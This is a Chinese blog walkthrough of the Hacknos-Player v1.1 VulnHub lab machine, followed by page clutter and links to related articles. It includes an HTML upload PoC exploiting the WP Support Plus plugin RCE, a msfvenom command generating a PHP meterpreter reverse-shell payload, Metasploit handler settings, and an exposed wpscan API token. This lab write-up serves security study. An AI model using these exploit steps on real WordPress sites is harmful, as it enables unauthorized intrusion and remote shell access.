Hacknos-Player V1.1靶机

最新推荐文章于 2024-07-28 23:54:43 发布
最新推荐文章于 2024-07-28 23:54:43 发布
阅读量300 收藏 2
点赞数 10
文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/140378315
版权

1.查看mac地址并通过攻击机kali扫描主机IP地址

2.扫描主机IP地址

3.端口扫描

4.访问80端口

5.扫描目录

6.发现没有扫描出来有用信息在主页上发现

 7.拼接g@web

8.扫描二级目录

9.拼接wp-admin

10.通过插件发现是wordpress cms

11.使用wp-scan扫描站点用户和密码

12.在wp-loacl中发现了http://192.168.7.83/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1

访问

 13.发现了它的用户名和密码尝试登录发现密码不对

14.使用wpscan对网站进行漏洞扫描

wpscan --url http://192.168.7.83/g@web -e vp --api-token NCpd6sIerdVHZ48sTMJ4RIeawnhpImnOrjaxXiXgIX0

15.发现到了远程代码执行漏洞WP Support Plus Responsive Ticket System < 8.0.8 – Remote Code Execution (RCE) | Plugin Vulnerabilities

 

16.构造poc并创建成html文件

<form method="post" enctype="multipart/form-data" action="http://192.168.7.83/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

17.使用MSF生成PHP木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.75 LPORT=9999 x> 1.phtml

18.将生成的木马上传到1.html

19.进入msf进行监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.7.75
set LPORT  9999
exploit

 

20.上传的文件在

http://192.168.7.83/g@web/wp-content/uploads/wpsp/

21.访问文件成功反弹

左提溜
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hacknos-Player V1.1靶机渗透测试
weixin_58786230的博客
07-12 217
【代码】Hacknos-Player V1.1靶机渗透测试。
hackNos: Player v1.1靶机渗透
siaowei44的博客
07-26 486
概述 该靶机 下载地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 准备事项:在vulnhub下载的靶机很多时候都无法获得ip地址,这个问题困扰我很久,今天我探寻到一个有效的解决办法https://blog.csdn.net/asstart/article/details/103433065?utm_source=app ip地址 操作系统 靶机 192.168.74.198 Ubuntu 攻击主机 .
Vulnhub靶机HACKNOS_ PLAYER V1.1
LainWith的博客
02-12 1249
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站Getshell提权sudo提权获取所有Flag 介绍 系列: hackNos(此系列共7台) 发布日期:2020年04月10日 难度:初级-中级 Flag : 1个,根用户的root.txt 学习: wordpress 安全测试 远程代码执行 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 信息收集 主机发现 arp-
VulnHub:Hacknos-Player V1.1靶机
wbplife的博客
07-12 348
root用户目录下的root.txt。
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 287
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
S5730举例
jjjxxxhhh123的博客
07-27 653
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
使用WebSocket协议调用群发方法将消息返回客户端页面
2302_79840586的博客
07-27 922
使用WebSocket协议调用群发方法将消息返回客户端页面
【计算机网络】OSPF单区域实验
m0_65787507的博客
07-26 898
DR和BDR是由同一网段中所有的路由器根据路由优先级和Router ID通过Hello报文选举出来的,只有优先级大于0的路由器才具有选举资格。进行DR/BDR选举时每台路由器将自己选出的DR写入Hello报文中,发给网段上的每台运行OSPF协议的路由器。如果DR或BDR失效,或者有新的路由器加入网络并希望成为DR或BDR,那么它们将参与新的选举过程。4:非DR路由器将自己的LSA发送给DR,然后DR将这些LSA泛洪到整个区域,使所有路由器获得一致的LSDB,从而确保区域内路由器都能计算出相同的最短路径树。
使用 WebSocket 实现实时聊天
最新发布
weixin_44976692的博客
07-28 270
在现代网络应用中,实时聊天功能已经成为用户体验的重要组成部分。无论是社交媒体平台、在线客服系统还是多人在线游戏,实时聊天功能都为用户提供了即时沟通的便利。实现实时聊天的技术有很多种,其中 WebSocket 是最受欢迎和高效的解决方案之一。本文将介绍如何使用 WebSocket 实现一个简单的实时聊天应用,包括 WebSocket 的基本概念、服务端和客户端的实现、以及一些可能的优化和扩展。WebSocket 是一种在单个 TCP 连接上进行全双工、双向交互的协议。
通信原理-思科实验五:家庭终端以太网接入Internet实验
sinat_39522506的博客
07-24 383
实验五 家庭终端以太网接入Internet实验。接着配置IP地址池和虚拟模板 开启宽带拨号。1.按照上图选择对应的设备,并连接起来。5.为路由器R1配置静态路由项。7.完成终端PC2 IP配置。
C#与欧姆龙PLC 通信——fins udp协议
qq_34059233的博客
07-28 36
该调试助手专门为了帮助大家学习以及测试Fins-Udp通信,下面进行详细介绍。
Hyperledger Fabric 网络体验 - 网络启动过程概览
ALONG的博客
07-25 478
作为第一次Fabric网络体验,网络启动主要包含三个操作,分别是生成配置文件、启动网络和操作网络。执行完指令能看到fabric已经启动。
应用层自定义协议以及序列化和反序列化
Xpccccc的博客
07-24 1018
应用层自定义协议以及序列化和反序列化
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
在本篇vulnhub靶机实战指南中,我们将会深入探讨针对"My-cmsms"靶机的实战操作。My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值